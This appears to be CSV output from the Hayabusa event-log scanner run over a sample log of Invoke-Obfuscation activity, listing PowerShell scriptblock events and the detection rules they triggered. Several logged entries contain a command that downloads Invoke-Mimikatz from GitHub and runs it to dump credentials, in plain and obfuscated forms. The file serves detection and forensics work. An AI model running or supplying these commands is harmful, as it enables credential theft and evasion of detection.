{ $InputOptionsCommands = $InputOptionsList[0] $InputOptionsDescription = $InputOptionsList[1] # Add additional coloring to string encapsulated by <> if it exists in $InputOptionsDescription. If($InputOptionsDescription.Contains('<') -AND $InputOptionsDescription.Contains('>')) { $FirstPart = $InputOptionsDescription.SubString(0,$InputOptionsDescription.IndexOf('<')) $MiddlePart = $InputOptionsDescription.SubString($FirstPart.Length+1) $MiddlePart = $MiddlePart.SubString(0,$MiddlePart.IndexOf('>')) $LastPart = $InputOptionsDescription.SubString($FirstPart.Length+$MiddlePart.Length+2) Write-Host ""$LineSpacing $FirstPart"" -NoNewLine Write-Host $MiddlePart -NoNewLine -ForegroundColor Cyan Write-Host $LastPart -NoNewLine } Else { Write-Host ""$LineSpacing $InputOptionsDescription"" -NoNewLine } $Counter = 0 ForEach($Command in $InputOptionsCommands) { $Counter++ Write-Host $Command.ToUpper() -NoNewLine -ForegroundColor Yellow If($Counter -lt $InputOptionsCommands.Count) {Write-Host ',' -NoNewLine} } Write-Host '' } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:16:32.699 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$_[1].Trim()},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:16:32.703 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{$TempUserInput = $TempUserInput.Replace([String]([Char]$_),'')}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:16:32.714 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{$TempUserInput = $TempUserInput.Replace($_,'')}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:16:37.997 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"Function Show-Tutorial { <# .SYNOPSIS HELPER FUNCTION :: Displays tutorial information for Invoke-Obfuscation. Invoke-Obfuscation Function: Show-Tutorial Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Show-Tutorial displays tutorial information for Invoke-Obfuscation. .EXAMPLE C:\PS> Show-Tutorial .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> Write-Host ""`n`nTUTORIAL"" -NoNewLine -ForegroundColor Cyan Write-Host "" :: Here is a quick tutorial showing you how to get your obfuscation on:"" Write-Host ""`n1) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Load a scriptblock (SET SCRIPTBLOCK) or a script path/URL (SET SCRIPTPATH)."" Write-Host "" SET SCRIPTBLOCK Write-Host 'This is my test command' -ForegroundColor Green"" -ForegroundColor Green Write-Host ""`n2) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Navigate through the obfuscation menus where the options are in"" -NoNewLine Write-Host "" YELLOW"" -NoNewLine -ForegroundColor Yellow Write-Host ""."" Write-Host "" GREEN"" -NoNewLine -ForegroundColor Green Write-Host "" options apply obfuscation."" Write-Host "" Enter"" -NoNewLine Write-Host "" BACK"" -NoNewLine -ForegroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""CD .."" -NoNewLine -ForegroundColor Yellow Write-Host "" to go to previous menu and"" -NoNewLine Write-Host "" HOME"" -NoNewline -ForegroundColor Yellow Write-Host ""/"" -NoNewline Write-Host ""MAIN"" -NoNewline -ForegroundColor Yellow Write-Host "" to go to home menu.`n E.g. Enter"" -NoNewLine Write-Host "" ENCODING"" -NoNewLine -ForegroundColor Yellow Write-Host "" & then"" -NoNewLine Write-Host "" 5"" -NoNewLine -ForegroundColor Green Write-Host "" to apply SecureString obfuscation."" Write-Host ""`n3) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Enter"" -NoNewLine Write-Host "" TEST"" -NoNewLine -ForegroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""EXEC"" -NoNewLine -ForegroundColor Yellow Write-Host "" to test the obfuscated command locally.`n Enter"" -NoNewLine Write-Host "" SHOW"" -NoNewLine -ForegroundColor Yellow Write-Host "" to see the currently obfuscated command."" Write-Host ""`n4) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Enter"" -NoNewLine Write-Host "" COPY"" -NoNewLine -ForegroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""CLIP"" -NoNewLine -ForegroundColor Yellow Write-Host "" to copy obfuscated command out to your clipboard."" Write-Host "" Enter"" -NoNewLine Write-Host "" OUT"" -NoNewLine -ForegroundColor Yellow Write-Host "" to write obfuscated command out to disk."" Write-Host ""`n5) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Enter"" -NoNewLine Write-Host "" RESET"" -NoNewLine -ForegroundColor Yellow Write-Host "" to remove all obfuscation and start over.`n Enter"" -NoNewLine Write-Host "" UNDO"" -NoNewLine -ForegroundColor Yellow Write-Host "" to undo last obfuscation.`n Enter"" -NoNewLine Write-Host "" HELP"" -NoNewLine -ForegroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""?"" -NoNewLine -ForegroundColor Yellow Write-Host "" for help menu."" Write-Host ""`nAnd finally the obligatory `""Don't use this for evil, please`"""" -NoNewLine -ForegroundColor Cyan Write-Host "" :)"" -ForegroundColor Green }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:17:12.146 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:17:12.146 +09:00,SEC511,4104,medium,Exec,Windows PowerShell Web Request,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Exec,Suspicious PowerShell Invocations - Specific,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Exec,Malicious Nishang PowerShell Commandlets,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Commandlets,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:17:39.237 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"Get-WinEvent @{logname=""Microsoft-Windows-PowerShell/Operational"";ID=4104}|fl|more",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:17:47.492 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:17:57.725 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{If((Get-Random -Minimum 0 -Maximum 2) -eq 0) {([String]$_).ToUpper()} Else {([String]$_).ToLower()}},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:18:01.084 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".((Gv '*mDR*').nAmE[3,11,2]-jOiN'')((('IEX (New'+'-Ob'+'jec'+'t Net.WebClient).DownloadString({0}ht'+'tps://'+'raw.git'+'hubus'+'ercontent.com/mattifest'+'ation/Po'+'werSploit/ma'+'st'+'er/Exfil'+'t'+'r'+'ati'+'on/Invoke'+'-Mimika'+'t'+'z'+'.ps1{'+'0}); Inv'+'oke-'+'Mi'+'m'+'ikat'+'z -Dum'+'p'+'Creds') -f[cHaR]39))",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:18:01.084 +09:00,SEC511,4104,medium,Exec,Windows PowerShell Web Request,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:18:19.204 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.3.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:18:44.958 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"&( $PsHome[4]+$pshOME[34]+'X') ((((""{64}{90}{3}{91}{14}{40}{67}{6}{37}{36}{22}{87}{60}{10}{35}{57}{43}{44}{41}{7}{19}{50}{68}{12}{0}{31}{85}{88}{72}{25}{63}{32}{5}{39}{46}{65}{26}{42}{30}{77}{76}{15}{73}{75}{82}{86}{4}{70}{51}{47}{13}{56}{89}{66}{83}{49}{1}{34}{27}{79}{20}{11}{59}{45}{17}{24}{84}{33}{21}{48}{71}{18}{23}{16}{28}{29}{80}{74}{2}{38}{81}{54}{62}{78}{69}{52}{61}{53}{9}{58}{55}{8}"" -f'r','tiyJa','Ja','a*mDR*yJa).nAmE','it/ma','tyJ','IEX (New','ient)',')) ','CredsyJa','a','-M','dSt','J','3,11','J','nvyJa','t','yJa0','.D','keyJa+yJa','yJa+yJ','-ObyJa+','}); I','yJa','yJatps://yJa','aercontent.com','yJ','+','yJaoke-yJa+','ma','i','gi','z','+','+','Ja','yJa+y','myJa','a+yJahub',',2]-jOiNyJayJ','ebCl','/','at Ne','t.W','Ja+yJa','usyJa+','ty','a.ps1','yJa+yJaa','ow','Jas','DumyJa+yJa','yJa','Ja','cHaR]39','a+yJaer/','yJ',') -f[','imikay','ecyJ','pyJa+','ikaty','+yJaraw.','.','yJ','xfilyJa+yJatyJa+','a)(((yJa','nloa','Jaz -','yJa+y','{yJa+','}htyJa+','a+yJaat','yJa+y','ion/','sty','ttife','Ja+y','aon/Invo','yJaMi','+y','PoyJa','yJar','+yJa','ng({','+yJawerSplo','yJaj','0','E','((Gv yJ','[')) -cRepLAce ([ChaR]121+[ChaR]74+[ChaR]97),[ChaR]39))",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:18:50.150 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:19:05.622 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"Set-vaRiablE (""2K""+""h8"") ( ""NoIsSeRpxE-EkOVnI | )63]RAhc[,'6V0' eCALpER- 43]RAhc[,'t3a'eCALpER- 93]RAhc[,)17]RAhc[+48]RAhc[+37]RAhc[( ecalPerC- )' ))93]RahC[,)79]RahC[+47]RahC[+121'+']RahC[( ecALpeRc- ))G'+'TI['+'GTI,GTIJy vG((GTI,GTIEGTI,GTI0GTI,GTIjaJyGTI,GTIolpSrewaJy+GTI,GTI{(gnGTI,GTIa'+'Jy+GTI,GTIraJyGTI,GTIaJ'+'yoPGTI,GTIy+GTI,GTIiMaJyGTI,GTIovnI/noaGTI,GTIy+aJGTI,GTIefittGTI,GTIytsGTI,GTI/noiGTI,GTIy+aJyGTI,GTItaaJ'+'y+aGTI,GTI+aJyth}GTI,GTI+aJy{GTI,GTIy+aJyGTI,GTI- zaJGTI,GTIaolnGTI,GTIaJy((()aGTI,GTI+aJytaJy+aJylifxGTI,GTIJyGTI,GTI.GTI,GTI.waraJy+GTI,GT'+'IytakiGTI,GTI+aJypGTI,GTIJyceGTI,G'+'TIyakimiGTI,GTI[f- )GTI,GTIJyGTI,GTI/reaJ'+'y+aGTI,GTI93]RaHcGTI,GTIaJGTI,GTIaJyGTI'+',GTIaJy+a'+'Jym'+'uDGTI,GTIsaJGTI,GTIwoGT'+'I,GTIaaJy+aJyGT'+'I,GTI1sp.aGTI,GTIytGTI,GTI+aJys'+'uGTI,GTIaJy+aJGTI,GTIW.tGTI,GTIeN taGTI,GTI/GTI,GTIlCbeGTI,GTIJyaJy'+'NiOj-]2,GTI,GTIbuhaJy+aGTI,GTIaJymGTI,GTIy+aJyGTI,GTIaJGTI,GTI+GTI,GTI+GTI,GTIzGTI,GTIigGTI,GTIiGTI,GTIamGTI,GTI+aJy-ekoaJyGTI,GTI+GTI,GTIJyGTI,GTImoc.tnetnocreaGTI,GTIaJy//:sptaJyGTI,GT'+'IaJyGTI,GTII ;)}GTI,GTI+aJybO-GTI,GTI'+'J'+'y+aJyGTI,GTIaJy+aJyekGTI'+',GTID.GTI,GTI0aJyGTI,GTI'+'tGTI,GTIaJyvnGTI,GTIJGTI,GTI11,3GTI,GTIJGTI,GTItSdGTI,GTIM-GTI,GTIaGTI,GTIaJysderCGTI,GTI ))GTI,GTI)tneiGTI,GTIweN( XEIGTI,GTIJytGTI'+',GTIam/tiGTI'+',GTIEmAn.)aJy*RDm*aGTI,GTIaJGTI,GTIaJyitGTI,GTIrGTIf- t3a}8{}'+'55{}85{}9{}35{}16{}25{}96{}87{}26{}45{}18{}83{}2{}47'+'{}08{}92{}82{}61{}32{}81{}17{}84{}12{}'+'33{}48{}42{}71{}54{}9'+'5{}11{}02{}9'+'7{}72{}43{}1{}94{}38{}66{}98{}65{}31{}74{}15{}07{}4{}68{}28{}57{}37{}51{}67{}77{}03{}24{}62{}56{}64{}93'+'{}5{}23{}36{}52{}27{}88{}58{}13'+'{}0{}21{}86{}05{}91{}7{}14{}44{}34{}75{}53{}0'+'1{}06{}78{}22{}63{}73{}6{}76{}04{}41{}19{}3{}09{}46{t3a(((( )GTIXGTI+]43[EMOhsp6V0+]4[emoHsP6V0 (&'(("" ); .( $pshOME[4]+$PshOMe[34]+'x')( [STRInG]::jOiN( '', ( variabLE (""2K""+""H8"")).VAluE[ -1 ..-(( variabLE (""2K""+""H8"")).VAluE.leNGTH) ]) )",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:19:05.642 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"(('&( 0V6PsHome[4]+0V6pshOME[34]+ITGXITG) ((((a3t{64}{90}{3}{91}{14}{40}{67}{6}{37}{36}{22}{87}{60}{1'+'0}{35}{57}{43}{44}{41}{7}{19}{50}{68}{12}{0}{'+'31}{85}{88}{72}{25}{63}{32}{5}{'+'39}{46}{65}{26}{42}{30}{77}{76}{15}{73}{75}{82}{86}{4}{70}{51}{47}{13}{56}{89}{66}{83}{49}{1}{34}{27}{7'+'9}{20}{11}{5'+'9}{45}{17}{24}{84}{33'+'}{21}{48}{71}{18}{23}{16}{28}{29}{80}{'+'74}{2}{38}{81}{54}{62}{78}{69}{52}{61}{53}{9}{58}{55'+'}{8}a3t -fITGrITG,ITGtiyJaITG,ITGJaITG,ITGa*mDR*yJa).nAmEITG,'+'ITGit/maITG,'+'ITGtyJITG,ITGIEX (NewITG,ITGient)ITG,ITG)) ITG,ITGCredsyJaITG,ITGaITG,ITG-MITG,ITGdStITG,ITGJITG,ITG3,11ITG,ITGJITG,ITGnvyJaITG,ITGt'+'ITG,ITGyJa0ITG,ITG.DITG,'+'ITGkeyJa+yJaITG,ITGyJa+y'+'J'+'ITG,ITG-ObyJa+ITG,ITG}); IITG,ITGyJaI'+'TG,ITGyJatps://yJaITG,ITGaercontent.comITG,ITGyJITG,ITG+ITG,ITGyJaoke-yJa+ITG,ITGmaITG,ITGiITG,ITGgiITG,ITGzITG,ITG+ITG,ITG+ITG,ITGJaITG,ITGyJa+yITG,ITGmyJaITG,ITGa+yJahubITG,ITG,2]-jOiN'+'yJayJITG,ITGebClITG,ITG/ITG,ITGat NeITG,ITGt.WITG,ITGJa+yJaITG,ITGu'+'syJa+ITG,ITGtyITG,ITGa.ps1ITG,I'+'TGyJa+yJaaITG,I'+'TGowITG,ITGJasITG,ITGDu'+'myJ'+'a+yJaITG,'+'ITGyJaITG,ITGJaITG,ITGcHaR]39ITG,ITGa+y'+'Jaer/ITG,ITGyJITG,ITG) -f[ITG,ITGimikayIT'+'G,ITGecyJITG,ITGpyJa+ITG,ITGikatyI'+'TG,ITG+yJaraw.ITG,ITG.ITG,ITGyJITG,ITGxfilyJa+yJatyJa+ITG,ITGa)(((yJaITG,ITGnloaITG,ITGJaz -ITG,ITGyJa+yITG,ITG{yJa+ITG,ITG}htyJa+ITG,ITGa+y'+'JaatITG,ITGyJa+yITG,ITGion/ITG,ITGstyITG,ITGttifeITG,ITGJa+yITG,ITGaon/InvoITG,ITGyJaMiITG,ITG+yITG,ITGPoy'+'JaITG,ITGyJarITG,ITG+yJ'+'aITG,ITGng({ITG,ITG+yJawerSploITG,ITGyJajITG,ITG0ITG,ITGEITG,ITG((Gv yJITG,ITG'+'[IT'+'G)) -cRepLAce ([ChaR]'+'121+[ChaR]74+[ChaR]97),[ChaR]39)) ') -CrePlace ([chAR]73+[chAR]84+[chAR]71),[chAR]39 -REpLACe'a3t',[chAR]34 -REpLACe '0V6',[chAR]36) | InVOkE-ExpReSsIoN",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:19:25.754 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.3.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:19:43.056 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:19:43.075 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$DelimitedEncodedArray += ([String]([Int][Char]$_) + (Get-Random -Input $RandomDelimiters))},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:19:44.154 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:19:44.166 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:19:44.171 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:19:44.174 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:19:44.176 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:19:44.180 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:19:44.181 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:19:44.236 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{$EncodedArray += ([String]([Int][Char]$_) + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)))}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:19:46.183 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:19:46.196 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:19:46.238 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:20:18.176 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:22:15.729 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:22:15.743 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{$DelimitedEncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + (Get-Random -Input $RandomDelimiters))}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:22:16.186 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:22:16.194 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:22:16.199 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:22:16.202 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:22:16.205 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:22:16.208 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:22:16.212 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:22:16.222 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:22:16.253 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 